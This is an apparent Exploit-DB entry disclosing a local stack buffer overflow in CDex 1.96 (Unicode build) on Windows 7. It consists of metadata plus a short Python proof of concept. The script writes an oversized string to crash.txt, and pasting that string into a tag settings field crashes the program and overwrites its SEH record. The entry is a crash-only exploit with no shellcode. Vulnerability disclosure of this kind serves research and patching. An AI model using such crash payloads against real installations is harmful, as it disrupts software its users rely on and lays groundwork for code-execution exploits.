CDex 1.96 - Buffer Overflow (PoC)

Author: bzyo
type: dos
platform: windows
port: 
date_added: 2017-12-18 
date_updated: 2018-01-08 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt43500/screen-shot-2017-12-18-at-151757.png 
application_url: http://www.exploit-db.comCDex-1.96.exe

#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: CDex 1.96  - Local Stack Buffer Overflow
# Date: 17-12-2017
# Vulnerable Software: CDex 1.96 (Unicode Build)
# Vendor Homepage: http://cdex.mu/
# Version: v1.96
# Software Link: http://cdex.mu/?q=download
# Tested On: Windows 7 x32
#
#
# PoC: generate crash.txt, open app, go to options, settings, encoding, tags, paste crash.txt contents in picture text
#
# app crashes; 00420042 Pointer to next SEH record; no unicode ppr pointers
#


file="crash.txt"

crash = "A"*520 + "B"*4  		#seh

writeFile = open (file, "w")
writeFile.write( crash )
writeFile.close()